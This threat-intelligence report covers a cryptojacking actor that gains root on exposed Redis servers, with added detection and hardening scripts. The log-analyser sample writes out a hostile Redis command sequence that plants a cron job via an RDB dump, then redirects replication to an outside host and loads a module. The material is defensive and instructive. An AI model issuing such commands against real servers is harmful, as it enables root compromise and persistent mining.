TA-NATALSTATUS: Rootkit-Style Cryptojacking Dominates Exposed Redis Servers Globally
If Redis is open to the internet, assume compromise. This actor gains root with native Redis tricks, plants miners, and hides using “rootkit-style” evasion. Here’s how to spot it fast and close the hole for good.

TL;DR
- Lock down Redis now: require auth, bind to localhost/VPC, and segment networks.
- Hunt for stealth: detect renamed system tools (ps, top, curl, wget), immutable files, and rogue cron jobs.
- Kill persistence: remove miners, backdoors, and file immutability; rebuild binaries from known-good sources.
- Monitor resources: alert on sudden CPU spikes, outbound mining pools, and process cloaking.
- Instrument evidence: collect Redis command logs and host artifacts before remediation to preserve attribution.
Why it matters
SOC
- Unusual Redis commands on port 6379 from external IPs (e.g., CONFIG SET, SLAVEOF, MODULE LOAD).
- Host with high CPU for kworker/unknown processes and no matching ps/top entries.
- Outbound to mining pools (Stratum protocol on 3333/4444/5555) or DNS lookups for pool domains.
IR
- Triage for tampered binaries (/bin/ps, /usr/bin/top) and immutable flags (chattr +i).
- Preserve /etc/crontab, /var/spool/cron/*, SSH keys, /tmp droppers, Redis logs, and network PCAPs.
- Snapshot process tree, loaded kernel modules, and hash any “replaced” utilities from rescue media.
SecOps
- Enforce Redis hardening: requirepass, bind 127.0.0.1, protected-mode yes, security groups/ACLs.
- Deploy EDR (endpoint detection and response) with file-integrity monitoring on system utilities.
- Block egress to known mining pools; apply least-privilege IAM on cloud nodes/images.
Strategic
- Treat exposed Redis as a business risk: downtime, cloud spend blowouts, and IR cost.
- Add cryptojacking KPIs to cyber metrics (time-to-contain, extra cloud cost avoided).
- Require quarterly scans for internet-exposed services and misconfiguration audits.
Jargon quick defs:
cryptojacking = hijacking compute to mine cryptocurrency;
TTPs = tactics/techniques/procedures;
“rootkit-style binary hijacking” = replacing/renaming system tools to hide;
immutable file lock = chattr +i sets the immutable attribute, so the file cannot be modified, deleted, or renamed even by root until the attribute is cleared with chattr -i (which needs CAP_LINUX_IMMUTABLE).
The story in 60 seconds
Who/what/why: TA-NATALSTATUS is abusing unauthenticated or poorly configured Redis to gain root and mine crypto at scale. Activity is sustained in 2025 and confirmed through Aug 25, 2025, with high exposure in Finland, Russia, Germany, and the US.
How (TTPs): The actor uses native Redis commands to drop payloads, set persistence via cron, and add SSH backdoors. They rename common admin tools (ps, top, curl, wget) to blind operators, toggle immutable flags on their files, and run scanners (masscan, pnscan) for spread/lateral recon. They also kill rival miners (e.g., Kinsing) to monopolize hardware.
Impact: Cloud/critical infrastructure and tech/manufacturing/media see the worst cost and disruption. Misconfigurations + weak egress controls = long dwell time and bloated cloud bills.
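The Redis side of that TTP chain is visible in the command log. The following is an added example for this report, not code from the page or from the campaign: it parses redis-cli MONITOR output (or an equivalent command log), tracks each client connection's CONFIG SET dir / dbfilename changes so that a later SAVE can be tied to a file write into a sensitive path, and also flags SLAVEOF/REPLICAOF redirects, MODULE LOAD, admin commands from outside an allowlist, and key values that look like crontab lines or SSH public keys. The sample log, the trusted-network allowlist (10.0.0.0/8 plus loopback), the client addresses, the paths and the cron payload are all constructed for the example.

```python
"""Flag Redis-abuse command chains in `redis-cli MONITOR` / command-log output.

Added example for this report (not code from the original page or from the
campaign). The log below is constructed to look like MONITOR output; client
addresses, paths and the cron line are hypothetical.
"""
import ipaddress
import re
from typing import Dict, List, Optional

# MONITOR line: <unix ts> [<db> <client>] "CMD" "arg" ...  (client is ip:port, unix:<path> or lua)
_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')                           # one quoted, backslash-escaped argument
_CRON = re.compile(r'(\*|\d+)(/\d+)?( +(\*|\d+)(/\d+)?){4} +\S')    # "*/1 * * * * cmd"
_SSHKEY = re.compile(r'\bssh-(rsa|ed25519)\s+AAAA')

# Assumption for this example: only the app tier (10.0.0.0/8) and loopback may talk to Redis.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("127.0.0.0/8")]
# Directories where an RDB dump written via CONFIG SET dir becomes code or credentials.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/etc/", "/var/www")
ADMIN_CMDS = {"CONFIG", "SLAVEOF", "REPLICAOF", "MODULE", "DEBUG", "SAVE", "BGSAVE"}


def parse_monitor_line(line: str) -> Optional[dict]:
    """Return {ts, client, ip, cmd, args} for one MONITOR line, or None if it is not one."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"').replace("\\\\", "\\") for a in _ARG.findall(m["args"])]
    if not args:
        return None
    client = m["client"]
    ip = client.rsplit(":", 1)[0] if ":" in client else client
    return {"ts": float(m["ts"]), "client": client, "ip": ip, "cmd": args[0].upper(), "args": args[1:]}


def is_untrusted(ip: str, trusted=TRUSTED_NETS) -> bool:
    """True for any IP outside the allowlist; unix-socket and lua clients are local by definition."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in trusted)


def analyze(lines: List[str], trusted=TRUSTED_NETS) -> List[dict]:
    """Walk the log once, keeping per-client dir/dbfilename state so a later SAVE is tied to it."""
    findings: List[dict] = []
    state: Dict[str, dict] = {}
    for raw in lines:
        ev = parse_monitor_line(raw)
        if ev is None:
            continue
        cmd, args, client = ev["cmd"], ev["args"], ev["client"]
        st = state.setdefault(client, {"dir": None, "dbfilename": None})

        def flag(rule: str, severity: str, detail: str) -> None:
            findings.append({"rule": rule, "severity": severity, "client": client, "ts": ev["ts"], "detail": detail})

        if cmd in ADMIN_CMDS and is_untrusted(ev["ip"], trusted):
            flag("admin-from-untrusted", "high", f"{cmd} from an address outside the trusted networks")

        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            key, value = args[1].lower(), args[2]
            if key == "dir":
                st["dir"] = value
                flag("config-set-dir", "high" if value.startswith(SENSITIVE_DIRS) else "medium", f"dir -> {value}")
            elif key == "dbfilename":
                st["dbfilename"] = value
                flag("config-set-dbfilename", "medium", f"dbfilename -> {value}")
        elif cmd in ("SAVE", "BGSAVE") and (st["dir"] or st["dbfilename"]):
            target = f"{st['dir'] or '<default dir>'}/{st['dbfilename'] or '<default dbfilename>'}"
            flag("rdb-write-chain", "critical", f"dump written to {target} after dir/dbfilename change")
        elif cmd in ("SLAVEOF", "REPLICAOF") and args and args[0].upper() != "NO":
            flag("replication-redirect", "critical", f"now replicating from {':'.join(args[:2])}")
        elif cmd == "MODULE" and args and args[0].upper() == "LOAD":
            flag("module-load", "critical", f"native module {args[1] if len(args) > 1 else '?'}")
        elif cmd in ("SET", "SETEX", "APPEND", "MSET") and any(_CRON.search(a) or _SSHKEY.search(a) for a in args[1:]):
            flag("payload-in-value", "high", "key value looks like a crontab line or SSH public key")
    return findings


# Constructed sample: an application client, an attacker writing a crontab via an RDB dump,
# replication and module-load attempts from a second attacker address, then a local backup.
SAMPLE_LOG = """\
1724572800.101 [0 10.0.0.5:44012] "GET" "session:abc"
1724572800.105 [0 10.0.0.5:44012] "SETEX" "session:abc" "300" "{\\"uid\\":42}"
1724572801.220 [0 203.0.113.77:51234] "CONFIG" "SET" "dir" "/var/spool/cron"
1724572801.230 [0 203.0.113.77:51234] "CONFIG" "SET" "dbfilename" "root"
1724572801.240 [0 203.0.113.77:51234] "SET" "x" "\\n\\n*/1 * * * * /bin/sh /tmp/.x\\n\\n"
1724572801.250 [0 203.0.113.77:51234] "SAVE"
1724572802.000 [0 203.0.113.88:40010] "SLAVEOF" "198.51.100.9" "6379"
1724572803.000 [0 203.0.113.88:40010] "MODULE" "LOAD" "/tmp/exp.so"
1724572804.000 [0 unix:/var/run/redis/redis.sock] "BGSAVE"
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:8} {f['rule']:22} {f['client']:32} {f['detail']}")
```

Run it as a script to see the findings table, or feed it MONITOR output captured during an incident (MONITOR costs throughput, so prefer a short capture or a proxy-side command log on busy instances). The write-chain rule keys on the client connection: an attacker who sets dir and dbfilename on one connection and issues SAVE from another only trips the individual CONFIG SET rules, which is why those fire on their own. The local BGSAVE over the unix socket produces nothing, as it should.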
See it in your telemetry
- Mail: N/A (campaign is infrastructure-driven, not phish-first).
- Endpoint (Linux):
  - Hash/size mismatch for /bin/ps, /usr/bin/top; binaries with recent unexpected mtime.
  - crontab -l shows unknown entries; /etc/rc.local or systemd services calling miners.
  - Files or dirs with immutable attribute (lsattr) tied to miner paths in /tmp, /var/tmp, /opt.
- Network:
  - External access to Redis :6379 from the internet; CONFIG, SLAVEOF, or module load attempts.
  - Egress to Stratum pools, persistent TCP to unknown hosts on 3333/4444/5555; DNS for pool.*.
  - Lateral scanning bursts: masscan/pnscan signatures and SYN floods to common service ports.
- Redis:
  - redis-cli MONITOR/audit logs show unauthorized CONFIG SET, key writes from unknown IPs.
  - Unexpected dir/dbfilename changes pointing to writable system paths.
- Cloud:
  - Sudden CPU credit depletion (burstable types), cost spikes, or autoscaling anomalies on Redis hosts.
  - Instances with public IPs lacking SG/NSG restrictions; missing private endpoints/VPC peering.
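An added example for the Network bullets above, not code from the report: a triage pass over outbound flow records that combines the port rule the report gives (3333/4444/5555) and the pool.* hostname check with a check of the first payload line for Stratum JSON-RPC methods, which also catches pools listening on 443 where a port rule is blind. The flow records, hostnames, addresses and the agent string are constructed; the method list is the example's own.

```python
"""Triage outbound flows for miner-to-pool (Stratum) traffic.

Added example (not from the original report). Flow records below are constructed;
hostnames, addresses and the miner agent string are hypothetical.
"""
import json
import re
from typing import List

# Ports the report lists for Stratum; extend with what you observe in your own egress.
STRATUM_PORTS = {3333, 4444, 5555}
# JSON-RPC methods used by Bitcoin-style Stratum and by Monero-style pools ("login"/"submit").
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit", "login", "submit", "keepalived"}
# "pool." / "stratum-eu." style labels; "carpool.example" does not match because "pool" is mid-label.
_POOL_NAME = re.compile(r"(^|[.-])(pool|stratum)([.-]|$)", re.I)


def classify_flow(flow: dict) -> List[str]:
    """Return the reasons a flow looks like miner-to-pool traffic (empty list = nothing seen)."""
    reasons: List[str] = []
    if flow.get("dst_port") in STRATUM_PORTS:
        reasons.append(f"stratum-port:{flow['dst_port']}")
    host = flow.get("host") or ""
    if _POOL_NAME.search(host):
        reasons.append(f"pool-name:{host}")
    # Stratum is newline-delimited JSON-RPC; inspect the first client bytes of the connection.
    for line in (flow.get("payload") or "").splitlines():
        try:
            msg = json.loads(line)
        except ValueError:
            continue
        if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
            continue
        reasons.append(f"stratum-rpc:{msg['method']}")
        params = msg.get("params")
        agent = params.get("agent") if isinstance(params, dict) else None
        if agent:  # Monero-style login carries the miner's own user agent
            reasons.append(f"agent:{agent}")
    return reasons


def triage(flows: List[dict]) -> List[dict]:
    """Keep only flows with at least one reason, most reasons first, then by source for stable output."""
    hits = []
    for f in flows:
        reasons = classify_flow(f)
        if reasons:
            hits.append({**f, "reasons": reasons, "score": len(reasons)})
    return sorted(hits, key=lambda h: (-h["score"], h["src"]))


# Constructed flow records: (1) benign API call, (2) miner on a Stratum port with a pool hostname,
# (3) Stratum over 443 to an innocuous-looking host, (4) SSH on 4444 (port rule alone is noisy),
# (5) a hostname that contains "pool" but is not a pool label.
SAMPLE_FLOWS = [
    {"src": "10.0.0.12", "dst": "198.51.100.20", "dst_port": 443, "host": "api.example-payments.net", "payload": ""},
    {"src": "10.0.0.12", "dst": "198.51.100.21", "dst_port": 3333, "host": "pool.example-pool.net",
     "payload": '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4ABC...","pass":"x","agent":"example-miner/1.0"}}\n'},
    {"src": "10.0.0.30", "dst": "198.51.100.22", "dst_port": 443, "host": "cdn.example-update.net",
     "payload": '{"id":1,"method":"mining.subscribe","params":["example-miner/1.0"]}\n'},
    {"src": "10.0.0.31", "dst": "198.51.100.23", "dst_port": 4444, "host": "", "payload": "SSH-2.0-OpenSSH_9.6\r\n"},
    {"src": "10.0.0.40", "dst": "198.51.100.24", "dst_port": 443, "host": "www.carpool.example", "payload": ""},
]

if __name__ == "__main__":
    for h in triage(SAMPLE_FLOWS):
        print(h["score"], h["src"], "->", h["dst"], h["dst_port"], h["reasons"])
```

The port-only hit on the SSH flow is deliberate: it shows why the report's port list is a starting point for alerting, not a block list on its own, while the payload match on 443 is the one a port rule would never see.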
High Impact, Quick Wins
- Close the front door (now): Restrict Redis to localhost/VPC and require auth; verify with nmap from outside. Sell it: stops active theft today. Measure: exposed-to-internet count → 0; failed external connects logged.
- Restore system truth: Replace tampered utilities from gold images, remove chattr +i, nuke rogue cron/systemd entries, and redeploy from clean AMIs. Sell it: removes attacker invisibility. Measure: file-integrity baseline clean, no anomalous CPU over 72 hours.
- Choke egress: Block mining pools and Stratum at firewall/proxy; alert on future attempts. Sell it: hard dollar savings on cloud bills. Measure: outbound pool connections → 0; monthly compute spend variance back to baseline.
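What "close the front door" looks like in redis.conf, as an added example that is not from the original report: a small audit that flags the weak settings (bind on every interface, protected-mode off, no requirepass or an ACL default user with nopass, and CONFIG/SLAVEOF/REPLICAOF/MODULE/DEBUG still callable) and returns nothing on the hardened equivalent. The two config snippets are constructed and the requirepass value is a placeholder. The rename-command list and the ACL -@dangerous check are this example's choice rather than something the report prescribes, and whether redis runs as root is a process property the file cannot tell you.

```python
"""Audit a redis.conf for the exposure pattern this report describes.

Added example (not from the original page). Both configs are constructed; the
password value is a placeholder, not a real credential. This checks the file only:
it cannot tell you whether the process runs as root or what the host firewall allows.
"""
from typing import Dict, List, Optional, Tuple

# Commands the report names as the abuse primitives, plus DEBUG; either rename them away
# (rename-command X "") or strip them from the default ACL user with -@dangerous.
DANGEROUS = ("config", "slaveof", "replicaof", "module", "debug")


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive (lower-case) to every occurrence's argument list. Only '#' lines are comments."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        conf.setdefault(name.lower(), []).append(args)
    return conf


def _default_user(conf: Dict[str, List[List[str]]]) -> Optional[List[str]]:
    for occ in conf.get("user", []):
        if occ[:1] == ["default"]:
            return occ
    return None


def audit(text: str) -> List[Tuple[str, str, str]]:
    """Return (severity, rule, detail) triples; an empty list means every check passed."""
    conf = parse_conf(text)
    out: List[Tuple[str, str, str]] = []

    binds = [a.lstrip("-") for occ in conf.get("bind", []) for a in occ]   # "-::1" means optional bind
    if not binds:
        out.append(("high", "bind-missing", "no bind directive: Redis listens on every interface"))
    elif any(b in ("0.0.0.0", "::", "*") for b in binds):
        out.append(("high", "bind-all-interfaces", "bind " + " ".join(binds)))

    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        out.append(("medium", "protected-mode-off", "protected-mode no removes the last guard for an unbound, unauthenticated instance"))

    pw = conf.get("requirepass", [[]])[-1]
    pw_val = pw[0].strip('"') if pw else ""
    user = _default_user(conf)
    acl_nopass = user is not None and "nopass" in user
    acl_pw = user is not None and any(a[:1] in (">", "#") for a in user[1:])   # >clear or #sha256
    if acl_nopass:
        out.append(("critical", "no-auth", "ACL 'user default ... nopass' disables authentication"))
    elif not pw_val and not acl_pw:
        out.append(("critical", "no-auth", "requirepass is unset: anyone who can reach the port can run CONFIG SET"))
    elif pw_val and len(pw_val) < 24:
        out.append(("medium", "weak-password", f"requirepass is only {len(pw_val)} characters"))

    renamed = {occ[0].lower() for occ in conf.get("rename-command", []) if occ}
    acl_restricted = user is not None and "-@dangerous" in user
    missing = [c for c in DANGEROUS if c not in renamed]
    if missing and not acl_restricted:
        out.append(("high", "dangerous-commands-reachable",
                    "neither rename-command nor an ACL -@dangerous rule covers: " + ", ".join(missing)))
    return out


# Constructed: the exposure this report describes (auth commented out, bound to everything).
WEAK_CONF = """\
# redis.conf on an internet-facing host
bind 0.0.0.0
port 6379
protected-mode no
# requirepass foobared
daemonize yes
"""

# Constructed: the same instance after the quick wins; the password is a placeholder.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
port 6379
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command DEBUG ""
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(text) or "OK")
```

Renaming CONFIG to the empty string also blocks your own CONFIG SET at runtime, so on managed or clustered deployments the ACL route (Redis 6+, `user default ... +@all -@dangerous` with a separate operator user) is usually the better fit; the audit accepts either.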
Suggested Pivots
- Which specific persistence and [...], and how can endpoint detection and response (EDR), security information and event management (SIEM), and file integrity monitoring systems be optimized to detect these behaviors in real time?
- Given the high exposure rates of [...], how can threat intelligence and vulnerability management programs prioritize defensive measures across these geographic regions and critical sectors (cloud infrastructure, critical infrastructure, technology, manufacturing, media) to reduce the attack surface exploited by TA-NATALSTATUS?
- How does TA-NATALSTATUS’s aggressive elimination of rival [...], and what opportunities exist for leveraging this behavior to identify and disrupt competing malware campaigns during incident response and threat hunting operations?
Executive Summary
TA-NATALSTATUS is a highly disciplined cryptojacking threat actor exploiting exposed Redis servers worldwide, with a significant escalation observed in 2025. The group uses legitimate Redis commands against instances running as root to write files with root privileges, install miners, and establish persistence through malicious cron jobs, immutable file locks, and SSH backdoors. Advanced evasion techniques include rootkit-style binary hijacking (renaming ps, top, curl, wget), process cloaking, and command obfuscation, enabling the campaign to evade traditional detection and maintain long-term control.
The actor systematically scans for unauthenticated Redis instances (port 6379), disables security controls (SELinux, firewalls), and deploys network scanning tools (masscan, pnscan) for lateral movement. TA-NATALSTATUS actively terminates rival cryptojacking malware (e.g., Kinsing) to monopolize system resources, further complicating detection and remediation.
The campaign disproportionately impacts cloud infrastructure, critical infrastructure, technology, manufacturing, and media sectors, with exposure rates exceeding 30% in several major economies. No direct links to other APT groups have been identified, but the TTPs reflect a mature, evolving threat model.
Mitigation requires immediate hardening of Redis configurations (authentication, localhost binding, network segmentation), deployment of file integrity monitoring and EDR solutions, and regular security audits. Organizations should monitor for indicators such as renamed system binaries, unauthorized cron jobs, and immutable files, and develop incident response playbooks tailored to persistent cryptojacking threats. Continuous staff training and threat intelligence sharing are essential to address the systemic security gap and reduce dwell time.
The campaign’s evolution, aggressive anti-rival tactics, and global reach signal a sustained, high-impact threat to cloud and critical infrastructure, necessitating urgent, coordinated defensive action.
Research & Attribution
Historical Context
TA-NATALSTATUS is an advanced cryptojacking campaign active since 2020, escalating globally in 2025. It targets exposed Redis servers worldwide, exploiting misconfigurations to gain root access and install cryptocurrency miners. Unlike typical cryptojacking operations, TA-NATALSTATUS employs stealth, persistence, and resilience techniques such as rootkit-style binary hijacking, process cloaking, command obfuscation, and immutable file locks. The campaign aggressively eliminates rival malware to monopolize compromised systems. This reflects a systemic failure to secure Redis instances globally, creating a vast attack surface for automated exploitation.
Timeline
- 2020: Initial related cryptojacking campaigns involving exposed Redis instances reported by Trend Micro.
- 2020–2025: TA-NATALSTATUS evolved its tactics, techniques, and procedures (TTPs), adding stealth and persistence features.
- 2025: The campaign escalated globally, actively targeting Redis servers in the US, Europe, Russia, India, and other regions.
Origin
TA-NATALSTATUS is a threat actor or group specializing in cryptojacking via exploitation of misconfigured Redis servers. The actor uses legitimate Redis commands to gain root privileges by exploiting Redis instances running as root, enabling direct manipulation of system cron jobs for persistence. The campaign is identified and tracked primarily by CloudSEK, with its TTPs showing evolution from earlier multiplatform worms reported by Trend Micro.
Countries Targeted
- United States - Over 17% of Redis servers exposed.
- Germany - Approximately 33% of Redis servers exposed.
- United Kingdom - Around 27% of Redis servers exposed.
- Finland - About 41% of Redis servers exposed.
- Russia - Approximately 39% of Redis servers exposed.
Sectors Targeted
- Cloud Infrastructure - Exploitation of Redis servers for cryptojacking.
- Critical Infrastructure - Indirectly impacted due to reliance on cloud services.
- Technology - Targeted through compromised cloud and network infrastructure.
- Manufacturing - Affected by related malware campaigns.
- Media and Communications - Also targeted by associated malware.
Motivation
Financial gain through stealthy, persistent cryptocurrency mining. The actor aims to maintain long-term control over compromised servers to maximize mining revenue while evading detection and eliminating competing malware.
Attack Types
- Scanning for unauthenticated Redis servers on port 6379.
- Using legitimate Redis commands (CONFIG SET dir/dbfilename followed by SAVE) to write malicious cron jobs.
- Disabling security features like SELinux and firewalls.
- Hijacking system binaries (e.g., renaming ps and top) to hide mining processes.
- Renaming download tools (curl and wget) to evade detection.
- Installing scanning tools (masscan, pnscan) for lateral movement.
- Establishing persistence via immutable files (chattr +i) and SSH backdoors.
- Executing a "kill list" to terminate rival cryptojacking malware.